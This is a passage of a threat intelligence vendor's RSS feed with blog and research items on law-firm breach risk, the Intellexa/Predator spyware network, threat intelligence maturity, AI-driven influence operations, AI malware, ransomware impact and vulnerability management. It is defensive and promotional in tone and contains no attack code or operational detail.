        <p>When <a href="https://www.thinkbrg.com/notice-of-data-incident/">Berkeley Research Group was hit by ransomware in March 2025</a> during a $700 million leveraged buyout by TowerBrook Capital Partners, the attack exposed M&amp;A intelligence across hundreds of concurrent deals. This wasn’t just data theft; it was a systematic opportunity for market manipulation.</p>
        <p>Academic research quantifies the damage. The <a href="https://www.bayes.citystgeorges.ac.uk/__data/assets/pdf_file/0005/170078/Cass-Deal-Leaks-Press-Release-FINAL.pdf">Intralinks/Cass Business School study</a> found 8-10% of M&amp;A deals leak annually, with leaked deals achieving 47% median premiums versus 27% for non-leaked deals, which is a 20 percentage point difference worth millions per transaction. Only 49% of leaked deals complete versus 72% of non-leaked deals.</p>
        <p>The <a href="https://www.sec.gov/newsroom/press-releases/2024-24">Tyler Loudon case (2024)</a> demonstrated the benefits of access when the defendant stole M&amp;A information from his attorney wife, resulting in insider trading charges.</p>
        <h2>The Systematic Failure to Assess Professional Services Risk</h2>
        <p>Only <a href="https://www.americanbar.org/groups/law_practice/resources/tech-report/2022/cybersecurity/">30% of law firms report clients asking them to complete security questionnaires</a> (not that attestations are a wholly competent method for determining exposure risk), compared to a near-universal requirement for SaaS vendors. This exemption culture may stem from relationship bias and the misconception that “they’re not a tech vendor” despite law firms operating technology-intensive businesses.</p>
        <p>The data concentration goes untracked. A single firm may hold M&amp;A details, employee PII, trade secrets, litigation strategies, regulatory issues, and executive compensation across multiple business units that operate independently. The <a href="https://www.hipaajournal.com/orrick-herrington-sutcliffe-data-breach/">Orrick breach (2023)</a> exposed 637,000+ individuals precisely because the firm aggregated data from employment litigation, mergers and acquisitions (M&amp;A) transactions, and patent filings.</p>
        <p>Retention amnesia compounds the risk. Lawyers traditionally “<a href="https://public.dhe.ibm.com/software/emea/dk/frontlines/Best_practice_record_man.pdf">keep everything forever</a>” due to a risk-averse culture, and potential regulatory requirements. Data from cases in the 1990s may still exist on unpatched legacy servers. Each year of retention adds cumulative breach exposure, yet enterprises rarely ask law firms about deletion policies or data locations.</p>
        <h2>Strategic Actions for Enterprise Defense</h2>
        <p>Treating professional services firms as high-risk technology vendors requires structural changes to vendor management frameworks.</p>
        <ul>
          <li><strong>Eliminate standing exemptions:</strong> Subject law and consulting firms to the same security requirements as SaaS vendors, including SOC 2 verification, independent audits, and quarterly assessments, without granting relationship-based waivers.</li>
          <li><strong>Map concentration risk:</strong> Identify all professional services vendors with data access across business units. Calculate total organizational exposure when single firms hold aggregated intelligence across HR, legal, finance, and compliance matters.</li>
          <li><strong>Audit fourth-party dependencies:</strong> Require disclosure of critical vendors, including MSPs, cloud providers, SaaS vendors, and document management systems. A breach of fourth-party infrastructure becomes your breach through the use of API tokens, credential harvesting, and VPN pivoting.</li>
          <li><strong>Establish time-bound access:</strong> Implement purpose-limited credentials that expire at the conclusion of a matter. Eliminate long-lived access that persists in engagement reports and consulting code repositories.</li>
          <li><strong>Define retention requirements:</strong> Specify data deletion periods in contracts with confirmation requirements. Audit compliance quarterly, as many firms retain data indefinitely on legacy systems.</li>
          <li><strong>Deploy breach detection:</strong> Place honeytokens in systems accessible to professional services firms. Establish 24-48 hour notification SLAs with emergency credential rotation capabilities.</li>
          <li><strong>Create specialized incident response protocols:</strong> Develop playbooks specifically for law firm breaches addressing privilege complications, litigation exposure assessment, and regulatory notification requirements.</li>
          <li><strong>Use threat intelligence</strong> to map services firms’ domain and IP space. Use the infrastructure map to monitor and alert on observed traffic between malware implants and command-and-control (C2) infrastructure. <a href="https://www.recordedfuture.com/products/third-party-intelligence">Recorded Future's Third-Party Intelligence</a> automates this monitoring across your entire vendor ecosystem, providing real-time alerts when professional services firms show compromise indicators. Combined with <a href="https://www.recordedfuture.com/use-case/ransomware">Ransomware Mitigation</a> capabilities, organizations can track ransomware group TTPs, monitor extortion sites, and receive early warnings when vendors appear on leak sites. Immediately notify affected service providers, disable organizational access, and assist in remediation.</li>
        </ul>
        <h2>Wrap-Up</h2>
        <p>The evidence from 2025 makes the stakes undeniable. With <a href="https://www.findlaw.com/legalblogs/law-and-life/why-law-firms-are-prime-targets-for-cyberattacks/">21 law firm breaches in just the first five months of 2024</a> and incidents like Williams &amp; Connolly’s <a href="https://www.securityweek.com/chinese-hackers-breached-law-firm-williams-connolly-via-zero-day/">nation-state compromise</a> and Berkeley Research Group’s ransomware during active M&amp;A, the pattern is clear.</p>
        <p>When your law firm holding decades of critical data gets breached, you don’t have a vendor incident. You have a strategic intelligence compromise with multi-year competitive implications that traditional third-party risk frameworks didn’t adequately contemplate, as they exempt “trusted advisors” from the security scrutiny their data concentration demands. The shift from relationship-based trust to risk-based verification isn’t optional; it’s survival.</p>
        <p>Learn how <a href="https://www.recordedfuture.com/use-case/ransomware">Recorded Future's Ransomware Mitigation</a> and <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> solutions work together to protect against cascading vendor risk. From tracking ransomware groups targeting legal firms to monitoring your vendors for real-time compromise indicators, you can detect and respond to vendor compromises before they cascade into your organization.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1598a88927a7d76c46d08ac87690a31e4ecc61757.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Intellexa’s Global Corporate Web]]></title>
            <link>https://www.recordedfuture.com/research/intellexas-global-corporate-web</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/intellexas-global-corporate-web</guid>
            <pubDate>Wed, 03 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Uncover Intellexa’s global corporate web powering Predator spyware, front companies, and expanding targeting from civil society to executives worldwide.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>The author, Julian-Ferdinand Vögele, thanks Amnesty International's Security Lab for its ongoing reporting on the Intellexa and Predator spyware ecosystem. Today, Security Lab published a related report on Intellexa, which can be found <a href="https://securitylab.amnesty.org/latest/2025/12/intellexa-leaks-predator-spyware-operations-exposed/">here</a>.</div>
          </div>
        </div>
        <p>NOTE: This was updated on February 20, 2026, with a minor correction.</p>
        <h2>Executive Summary</h2>
        <p>Insikt Group identified several individuals and entities linked to Intellexa and its broader network of associated companies. These connections span technical, operational, and corporate roles, including backend development, infrastructure setup, and company formation. Using export and import data, Insikt Group identified one entity linked to the previously reported Czech cluster that facilitated the shipment of Intellexa products to clients. In at least one instance, a direct delivery was made to an end user, while additional entities in Kazakhstan and the Philippines appear to have been involved in product imports, indicating an expanding network footprint. Two additional entities in the advertising sector may be tied to the “Aladdin” ad-based infection vector, previously associated with the Czech cluster via a leaked 2022 invoice. In addition, Recorded Future’s proprietary intelligence revealed ongoing Predator spyware activity in multiple countries, including new evidence of its deployment in Iraq.</p>
        <p>The continued domestic use of mercenary spyware such as Predator poses significant privacy, legal, and physical security risks worldwide. Although civil society remains the primary target in most publicly documented cases, recent evidence shows that executives and other high-profile individuals with substantial intelligence value are increasingly being targeted as well. Due to Predator’s costly licensing model, operators are likely to reserve its deployment for high-value strategic targets, placing politicians, business leaders, and individuals in sensitive roles at heightened risk. Meanwhile, the widespread and likely unlawful use of spyware against political opposition continues to be a pressing issue under investigation in several European Union (EU) member states, including <a href="https://www.theguardian.com/world/2024/apr/01/poland-launches-inquiry-into-previous-governments-spyware-use">Poland</a> and <a href="https://www.politico.eu/article/christos-rammos-greece-privacy-chief-fighting-prime-minister-kyriakos-mitsotakis-spyware/">Greece</a>.</p>
        <p>Insikt Group assesses that several key trends are shaping the spyware ecosystem, including growing balkanization as companies split along geopolitical lines, with some sanctioned entities seeking renewed legitimacy through acquisitions while others shift toward regions with weaker oversight (<a href="https://www.calcalistech.com/ctechnews/article/r1er11mi61e">1</a>, <a href="https://techcrunch.com/2025/10/10/spyware-maker-nso-group-confirms-acquisition-by-us-investors/">2</a>). Despite this, a core network of facilitators <a href="https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/mythical-beasts-diving-into-the-depths-of-the-global-spyware-market/">continues</a> to underpin the industry’s operations. Furthermore, rising competition and secrecy surrounding high-value exploit technologies are heightening risks of corruption, <a href="https://techcrunch.com/2025/11/03/how-an-ex-l3-harris-trenchant-boss-stole-and-sold-cyber-exploits-to-russia/">insider leaks</a>, and attacks on spyware vendors themselves. Targeting has also expanded beyond traditional civil society figures to include corporate leaders and private-sector individuals (<a href="https://www.nytimes.com/2023/03/20/world/europe/greece-spyware-hacking-meta.html">1</a>, <a href="https://techcrunch.com/2025/10/09/italian-businessmans-phone-reportedly-targeted-with-paragon-spyware/">2</a>), suggesting that the publicly visible cases represent only a fraction of a much larger, concealed global ecosystem.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group uncovered additional companies highly likely tied to Intellexa’s broader corporate web, particularly within the previously discussed Czech cluster. At least one of these entities appears to have been used to ship Intellexa products to clients, offering further insight into Intellexa's global business structures.</li>
          <li>Two newly identified companies appear to operate in the advertising sector and may be connected to a previously reported ad-based infection vector known as “Aladdin.” This vector was earlier associated with the Czech cluster through a leaked invoice from 2022 showing payments for a proof-of-concept to an individual linked to that cluster.</li>
          <li>Analysis of export and import databases revealed indications that one of the newly identified companies was used to deliver Intellexa products to end customers, either directly or through intermediaries. This research also exposed two additional entities located in Kazakhstan and the Philippines.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_157108c6ad2d9500dab6015e5d3e0e0f867e6057a.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Maturity Gap: The Next Frontier in Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/blog/maturity-gap-next-frontier-in-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/maturity-gap-next-frontier-in-threat-intelligence</guid>
            <pubDate>Wed, 03 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn what advanced threat intelligence maturity really means and how to close the gap between current capabilities and predictive, autonomous operations.]]></description>
            <content:encoded><![CDATA[
      <div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1dca120266656dd3db5b0049e0c442a76bc5aa87c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="600" />
            </div>
          </div>
          <div>
            <div>
              <h1>The Maturity Gap: The Next Frontier in Threat Intelligence</h1>
            </div>
          </div>
        </div>
      </div>
      <div></div>
      <div>
        <h2>Introduction</h2>
        <p>In Recorded Future’s <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?_gl=1*fkod6r*_gcl_aw*R0NMLjE3NjI5NjQyNjAuQ2p3S0NBaUFfZERJQmhCNkVpd0F2emMxY055a29EUU9nWk5jMzhqcXhFN0pJVE0zbER1SXl0SmZ1d1NkdjdLdVRka29NQThsM2VGanN4b0NzYllRQXZEX0J3RQ..*_gcl_au*MjQ3MTMwMjMzLjE3NTczNDQ0NTM.">2025 State of Threat Intelligence report</a>, 49% of enterprises describe their threat intelligence maturity as advanced — a figure that might surprise anyone who sees how complex this work remains in practice. While many organizations have made real progress, few have achieved the seamless integration and automation that “advanced” maturity implies.</p>
        <p>At the same time, 87% of respondents expect significant improvement within the next two years, showing clear momentum and intent. The gap between today’s capabilities and tomorrow’s ambitions reflects a familiar reality: most teams have the right data but struggle to connect, automate, and operationalize it across their environments.</p>
        <p>This article explores what advanced maturity really looks like, why progress often stalls, and how enterprises can accelerate their evolution using insights from this year’s report.</p>
        <h2>What Advanced Threat Intelligence Maturity Really Means</h2>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/resources/maturity-assessment">maturity assessment model</a> outlines four stages of progress: Reactive, Proactive, Predictive, and Autonomous. Each stage reflects a higher level of integration, automation, and alignment across the business.</p>
        <p>Advanced maturity sits toward the predictive and autonomous end of that model. At this level, intelligence operates continuously, informing security and risk decisions in real time. Teams can see what’s changing across their environment and act quickly to limit impact.</p>
        <p>Mature programs pull in data from multiple internal and external sources, from threat feeds and vulnerability scanners to dark web monitoring and attack surface mapping. They use automation to cross-reference that information, enrich alerts with context, and flag the events that matter most. The same intelligence flows directly into the tools that analysts already use, such as SIEM and SOAR platforms, where it can trigger playbooks or prioritize vulnerabilities for patching. The result is less time spent chasing false positives and more time spent preventing real incidents.</p>
        <p>Ultimately, advanced maturity is about action. Intelligence should help teams decide faster, target the right adversaries, and strengthen how the SOC, red team, and leadership make decisions every day.</p>
        <h2>Why Most Organizations Still Struggle to Advance</h2>
        <p>Even as threat intelligence tools improve, most enterprises still face the same structural barriers that slow maturity. In the <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?_gl=1*fkod6r*_gcl_aw*R0NMLjE3NjI5NjQyNjAuQ2p3S0NBaUFfZERJQmhCNkVpd0F2emMxY055a29EUU9nWk5jMzhqcXhFN0pJVE0zbER1SXl0SmZ1d1NkdjdLdVRka29NQThsM2VGanN4b0NzYllRQXZEX0J3RQ..*_gcl_au*MjQ3MTMwMjMzLjE3NTczNDQ0NTM.">2025 State of Threat Intelligence report</a>, nearly half of respondents (48%) list poor integration with existing security tools among their top three pain points, and 16% rank it as their biggest issue. Siloed feeds and disconnected platforms continue to make it difficult to operationalize intelligence across the security stack.</p>
        <p>Another 50% of security professionals cite difficulty verifying the credibility and accuracy of intelligence. Without confidence in the data, analysts hesitate to automate or share findings broadly, keeping threat intelligence trapped in manual workflows and siloed from a wider audience of stakeholders who would benefit from the intelligence.</p>
        <p>Though 46% report information overload as a major obstacle, volume isn’t the only issue. It’s also context. The same percentage say intelligence often lacks relevance to their environment, which makes it harder to link threats to business risk or decide what truly deserves attention.</p>
        <p>These findings reflect an evolving market need: integration, trust, and relevance. Many teams have invested in more data and technology but still struggle to connect them in ways that deliver measurable improvement. The result is effort without momentum: progress that looks strong on paper but feels limited in day-to-day operations.</p>
        <h2>How to Build an Advanced Threat Intelligence Function</h2>
        <p>Closing the maturity gap starts with turning threat intelligence from a threat feed into a connected ecosystem of security tools that use and speak threat intelligence to inform decision making in real time. Most teams already have the ingredients — data feeds, automation platforms, and skilled analysts — but they’re often fragmented. Progress comes from building workflows that make intelligence part of everyday operations rather than a separate discipline.</p>
        <ul>
          <li><strong>Standardize and unify intelligence inputs.</strong> Consolidate vendors and combine internal telemetry with external threat data to create a single, reliable view of risk. When data sources align, teams can see the same picture and respond faster.</li>
          <li><strong>Automate enrichment and correlation.</strong> Replace manual investigation with automated context-building workflows that add detail to alerts as they’re generated. This helps analysts focus on analysis and decision-making instead of repetitive data gathering.</li>
          <li><strong>Integrate with core systems.</strong> Connect threat intelligence to SIEM, SOAR, EDR, and vulnerability management platforms so insights feed directly into detection and response. Integration reduces delay between visibility and action.</li>
          <li><strong>Leverage AI for speed and synthesis.</strong> Use AI models to summarize reports, surface anomalies, and streamline triage without increasing headcount. Automation at this level buys time for higher-value analysis.</li>
          <li><strong>Continuously measure maturity.</strong> Benchmark progress with frameworks like <a href="https://www.recordedfuture.com/resources/maturity-assessment">Recorded Future’s Threat Intelligence Maturity Assessment</a> to identify gaps and show measurable improvement over time.</li>
          <li><strong>Translate threats into impact.</strong> Map threats to the systems, data, and uptime they affect. When leaders understand operational impact, they can prioritize defenses that protect what matters most.</li>
        </ul>
        <h2>What Predictive and Autonomous Intelligence Deliver</h2>
        <p>In Recorded Future’s maturity model, predictive intelligence marks the point where teams move from detection to anticipation. Automation and analytics reveal early warning signs like new attacker infrastructure, emerging vulnerabilities, or shifts in adversary behavior, and feed that insight into prevention and risk planning. Predictive doesn’t mean knowing the future; it means seeing enough of what’s changing to act faster and more precisely.</p>
        <p>From here, intelligence systems connect signals across internal telemetry, ISACs, and external threat data to map adversary intent and likely attack paths. That awareness helps teams focus on the exposures most likely to impact their environment, improving visibility and reducing uncertainty before an incident occurs.</p>
        <p>At the autonomous stage, those workflows become largely self-directing. Machine learning and automation correlate data, generate detection rules, and trigger responses at a speed and scale that manual teams can’t sustain. Analysts move from running processes to refining them — validating alerts, adjusting priorities, and improving the quality of automation.</p>
        <p>Full automation isn’t always possible. Legacy systems, uneven tool coverage, and budget limits mean some work will always remain manual. But even partial autonomy delivers meaningful gains. Teams respond faster, cut repetitive tasks, and keep budgets within their boundaries. Most importantly, they protect uptime, secure sensitive data, and grow customer trust with greater consistency and control.</p>
        <h2>Closing the Maturity Gap</h2>
        <p>The 2025 State of Threat Intelligence findings show clear progress, but they also highlight how far most organizations need to travel still. Advanced maturity isn’t an end destination, but rather the milestone where intelligence becomes routine, embedded, and measurable across the business.</p>
        <p>Bridging the gap requires more than new tools. It takes alignment between technology, people, policy, and process: building workflows that connect intelligence to risk decisions, automating where it adds the most value, and measuring improvement over time. Every organization sits somewhere on this curve. The next step is to understand where you are, identify what’s holding you back, and make incremental changes that move intelligence closer to daily operations.</p>
        <p>Use the <a href="https://www.recordedfuture.com/resources/maturity-assessment">Recorded Future Threat Intelligence Maturity Assessment</a> to benchmark your progress, and download the full <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?_gl=1*fkod6r*_gcl_aw*R0NMLjE3NjI5NjQyNjAuQ2p3S0NBaUFfZERJQmhCNkVpd0F2emMxY055a29EUU9nWk5jMzhqcXhFN0pJVE0zbER1SXl0SmZ1d1NkdjdLdVRka29NQThsM2VGanN4b0NzYllRQXZEX0J3RQ..*_gcl_au*MjQ3MTMwMjMzLjE3NTczNDQ0NTM.">2025 State of Threat Intelligence report</a> to see how peers are advancing their programs, and what it takes to close the gap for good.</p>
      </div>
      <div></div>
    ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1dca120266656dd3db5b0049e0c442a76bc5aa87c.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Inside the CopyCop Playbook: How to Fight Back in the Age of Synthetic Media]]></title>
            <link>https://www.recordedfuture.com/blog/inside-the-copycop-playbook</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/inside-the-copycop-playbook</guid>
            <pubDate>Tue, 02 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Uncover how Russia’s CopyCop network uses AI-generated news and fake media sites to influence global audiences—and learn the key defenses against synthetic media threats.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li>CopyCop is scaling AI-driven influence operations globally. The Russian influence network known as CopyCop has created more than 300 fake media websites spanning North America, Europe, and beyond. The operation primarily uses AI-generated content to erode public trust and support for Ukraine.</li>
                <li>AI has become the new engine of manipulation. The network uses self-hosted large language models (LLMs) to mass-produce fabricated news stories, deepfakes, and fake fact-checking sites that imitate legitimate journalism.</li>
                <li>Transparency and intelligence are the best defenses. Governments, newsrooms, and enterprises can counter these operations through domain monitoring, content verification, and proactive intelligence sharing.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c93c29bb7b4d4ad423829bf579d68521a211553a.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[AI Malware: Hype vs. Reality]]></title>
            <link>https://www.recordedfuture.com/blog/ai-malware-hype-vs-reality</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ai-malware-hype-vs-reality</guid>
            <pubDate>Mon, 01 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A grounded look at AI malware: most threats sit at low maturity levels, with no verified autonomous BYOAI attacks. Learn what’s real, what’s hype, and how defenders should respond.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li>Most “AI malware” observed so far falls into the AI malware Maturity Model (AIM3) Levels 1-3 (Experimenting through Optimizing), rather than fully automated campaigns.</li>
                <li>AI is currently a force multiplier on existing attacker tradecraft, not a source of fundamentally new TTPs.</li>
                <li>Many “first-ever AI malware” announcements are narrow research demos or PoCs with limited autonomy and unclear real-world impact.</li>
                <li>Public reporting shows no confirmed examples of truly embedded, Bring-Your-Own-AI (BYOAI) malware running its own local model on victim hosts.</li>
                <li>Defenders should prioritize monitoring abuse of legitimate AI services, hardening existing controls, and mapping threats to AIM3 levels rather than overreacting to sci-fi scenarios.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1579402d5d0163bfc8366e1ac11f85c900262e0ec.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[How Ransomware Affects Business Operations, Revenue, and Brand Reputation]]></title>
            <link>https://www.recordedfuture.com/blog/how-ransomware-affects-businesses</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/how-ransomware-affects-businesses</guid>
            <pubDate>Mon, 01 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how ransomware works, how it can impact operations, revenue, and brand reputation, and how to prevent ransomware from infecting your business.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li>Ransomware disrupts business on multiple fronts, causing operational shutdowns, financial strain, and lasting reputational harm.</li>
                <li>Modern attacks rely on multi-stage intrusion tactics, from credential theft to data extortion, that exploit gaps across people, processes, and technology.</li>
                <li>Recovery is complex and prolonged, often requiring sustained operational, legal, and communications efforts.</li>
                <li>Intelligence-led visibility is the most effective defense, enabling teams to anticipate ransomware activity and respond with speed and precision.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1070317ee0daef387ebb99c32488b01ea4632ecbf.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Integrating Threat Intelligence and Vulnerability Management: A Modern Approach]]></title>
            <link>https://www.recordedfuture.com/blog/threat-intelligence-and-vulnerability-management</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-intelligence-and-vulnerability-management</guid>
            <pubDate>Wed, 26 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how combining threat intelligence and vulnerability management creates a modern approach to risk reduction and how Recorded Future integrates both.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Traditional vulnerability management (VM) overwhelms teams with undifferentiated findings; integrating threat intelligence adds real-world context so you can fix what’s actually being targeted first.</li>
          <li>Threat intelligence-enriched, risk-based prioritization reduces MTTR, aligns with business risk, and moves programs from reactive to proactive.</li>
          <li>A modern approach uses automated risk scoring, dashboards, and workflow integrations to operationalize intelligence inside existing VM processes.</li>
          <li>Recorded Future’s Vulnerability Intelligence provides real-time risk scoring, exploitability insights, and integrations with leading VM platforms to drive action.</li>
        </ul>
        <h2>Introduction</h2>
        <p>In today’s threat landscape, security teams struggle under the growing challenge of vulnerability overload. Dozens of new CVEs are disclosed daily, spanning a wide diversity of technologies—<a href="https://www.cve.org/about/Metrics">over 40,000 were published in 2024 alone</a>. Without strong organization, prioritization, and visibility, this flood of vulnerabilities can overwhelm remediation teams and leave truly dangerous gaps unaddressed. Teams need a way to separate noise from risk and focus effort where it counts. Without comprehensive visibility and well-defined workflows, organizations have no way of knowing which vulnerabilities matter most, and remediation stalls.</p>
        <p>Risk-based prioritization—especially when grounded in threat context—keeps patching aligned with real-world attacker activity and an organization’s most critical assets. This is where threat intelligence changes the game. By adding insight on active exploits, attacker interest, and malware associations to vulnerability data, teams can identify which issues are actively being targeted and prioritize those first. The result is a modern, intelligence-driven approach to vulnerability management that bridges the gap between endless vulnerability lists and actual risk reduction.</p>
        <h2>Understanding Threat Intelligence and Vulnerability Management</h2>
        <p>Before organizations can modernize their approach to vulnerability management, it’s important to understand the two core disciplines involved, and the limitations that emerge when they operate independently. Threat intelligence and vulnerability management are both essential to reducing cyber risk, but too often weak integration keeps teams from acting on intelligence to actually get ahead of critical vulnerabilities. To appreciate the value of integrating threat intelligence with vulnerability management, let’s define each discipline and their traditional limitations:</p>
        <ul>
          <li>Threat Intelligence: Threat intelligence refers to curated information about malicious actors, their tactics, and emerging attacks that helps defenders make informed decisions. Threat Intelligence encompasses data on indicators of compromise, adversary techniques, and observed exploits in the wild. The goal is to understand the current threat landscape and anticipate how attackers might strike next.</li>
          <li>Vulnerability Management (VM): Vulnerability management is the process of systematically identifying, assessing, and remediating weaknesses (software bugs, misconfigurations, etc.) in an organization’s systems. Traditional VM programs rely on network scanners and inventory databases to discover vulnerabilities, assign severity scores (e.g. CVSS), and then patch or mitigate the issues based on priority. The standard VM cycle involves scanning for known CVEs, producing a list of findings, fixing what you can, and then rescanning to verify fixes.</li>
        </ul>
        <h3>The Limitations of Siloed Approaches</h3>
        <p>Performed in silos, a major gap exists between finding vulnerabilities and actually reducing risk. VM tools excel at detecting thousands of issues, but without threat context they can’t tell which of those hundreds of critical CVEs truly pose a real risk to your organization. This often leads teams to fix issues based purely on CVSS severity or ease of patching—a numbers-driven approach that may leave actively exploited vulnerabilities unpatched. Meanwhile, threat intelligence teams might be tracking dangerous new exploits or adversary campaigns, but if that intel isn’t linked to the VM process, it never informs patch prioritization. The two teams operate on parallel tracks, missing the synergy needed to combat real threats.</p>
        <p>Without integrating threat intelligence and VM, there’s <a href="https://www.recordedfuture.com/blog/closing-vulnerability-gaps">a dangerous disconnect</a>—critical vulnerabilities may linger unaddressed because the VM team lacks insight into real-world threat activity, and threat intel may be under-leveraged without an established path to inform remediation efforts.</p>
        <h2>Challenges of Traditional Vulnerability Management</h2>
        <p>Even the most well-resourced teams struggle to keep pace with today’s vulnerability landscape. The sheer volume of findings, the limited context available, and the pressure to act quickly all create structural weaknesses in traditional VM programs. Key issues include:</p>
        <h3>An Overwhelming Volume of CVEs</h3>
        <p>Modern organizations face an avalanche of vulnerabilities. Each vulnerability scan can return hundreds or thousands of findings, and new CVEs are disclosed at a record pace every year. This sheer volume makes it impractical for teams to patch everything, but without further guidance, many vulnerability managers feel pressure to fix as much as possible and use raw counts of patched bugs as a success metric. The result is often firefighting and fatigue. Additionally, using volume-based metrics rather than those tied to impact reduces the credibility of your VM program.</p>
        <h3>Lack of Real-World Threat Context</h3>
        <p>Traditional VM programs typically prioritize based on static severity scores (CVSS) or vendor guidance, which show how critical a vulnerability would be if exploited, but do not reflect whether attackers are actively targeting it. A flaw might be rated 9.8 “critical” on CVSS, but if no threat actors are targeting it, it poses less immediate risk than a 7.0 “high” that’s being widely exploited in the wild. Without <a href="https://www.recordedfuture.com/products/threat-intelligence">threat intelligence</a>, vulnerability managers lack insight into which vulnerabilities are featured in exploit kits, mentioned on dark web forums, or being leveraged in recent breaches.</p>
        <h3>Resource Constraints in Remediation Teams</h3>
        <p>Most security and IT teams simply don’t have enough personnel or downtime to remediate every vulnerability promptly. Legacy vulnerability management often operates on a reactive model—scan, list, and attempt to patch—which can overwhelm teams. They must triage an endless queue of patches, schedule maintenance windows, and avoid disrupting critical systems. With limited staff, it’s common for patch backlogs to grow.</p>
        <h3>Reactive vs. Proactive Posture</h3>
        <p>Reactive approaches are driven by periodic scan reports or the latest security bulletin. Organizations may only discover a need to patch when the scanner flags a new CVE—or worse, when an incident responder finds that attackers exploited a missing patch. In fact, threat actors are getting faster at exploiting new flaws—it often takes only around <a href="https://www.recordedfuture.com/blog/closing-vulnerability-gaps">15 days</a> for an exploit to appear in the wild once a vulnerability is disclosed ￼. This means a purely reactive patch cycle leaves a dangerous exposure window. The key challenge is shifting out of react mode and into a more proactive, <a href="https://www.recordedfuture.com/blog/enhancing-vulnerability-management">intelligence-informed strategy</a> that addresses likely threats before they strike,ultimately helping to close those vulnerability gaps.</p>
        <h2>How Threat Intelligence Strengthens Vulnerability Management</h2>
        <p>Threat intelligence adds a critical dimension that traditional VM tools simply can’t provide: a real-time view of attacker behavior. This context transforms raw vulnerability data into something actionable, allowing teams to focus their attention on the issues that genuinely matter. By weaving threat intelligence into the VM lifecycle, organizations can meaningfully elevate their defenses.</p>
        <p>By incorporating threat intelligence, vulnerability management teams gain up-to-the-minute awareness of which vulnerabilities are being actively exploited or discussed by attackers. Knowing that a given CVE is being used to target your industry, leveraged in ransomware attacks, or scanned for by adversaries elevates its priority dramatically. Such context allows you to focus remediation on the vulnerabilities most likely to impact your organization’s systems.</p>
        <p>Meanwhile, intelligence enables a shift from a purely severity-based approach to a risk-based vulnerability management strategy. Instead of treating all “critical” CVEs as equal, teams combine internal asset criticality with external threat likelihood to calculate risk. By fusing threat intel (exploit availability, attacker interest, trending malware) with vulnerability data, organizations can remediate the vulnerabilities that pose the greatest real-world risk first, dramatically reducing the chances of breach.</p>
        <p>With better prioritization and context, security teams can respond faster to the vulnerabilities most dangerous to their specific organization. Threat intelligence acts as an early-warning system. It can alert you to a new critical CVE that’s being weaponized in the wild days or weeks before official sources might highlight it. That lead time means patches or mitigations can be applied sooner, shrinking the window of exposure.</p>
        <p>Finally, threat intelligence helps translate the technical details of vulnerabilities into business impact terms, improving communication with leadership and other stakeholders. By understanding which vulnerabilities could actually disrupt the business, security teams can better convey urgency to management and get support for emergency patches or downtime. Integrating threat intelligence also fosters alignment between the threat intel analysts and the vulnerability management/IT teams. Ultimately, intelligence-driven VM ensures that vulnerability prioritization maps to <a href="https://www.recordedfuture.com/blog/how-security-leaders-defend-their-attack-surface">the organization’s highest risks</a> and threat scenarios, rather than an abstract severity rating.</p>
        <h2>Benefits of an Integrated Cybersecurity Approach</h2>
